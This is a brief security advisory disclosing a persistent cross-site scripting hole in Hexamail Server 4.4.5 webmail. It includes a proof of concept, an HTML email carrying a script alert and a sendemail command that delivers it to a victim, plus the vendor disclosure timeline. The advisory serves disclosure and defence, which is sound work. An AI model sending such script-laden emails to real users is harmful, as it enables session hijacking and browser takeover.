Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.
Proof of concep
By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.
root@bt:~/# cat > meal.txt <html> <body> <h1>XSS pop up</h1> <script>alert('Hi, what is this?');</script> </body> </html> root@bt:~/#
Send email to the victim:
root@bt:~/# sendemail -f [email protected] -t [email protected] -xu [email protected] -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.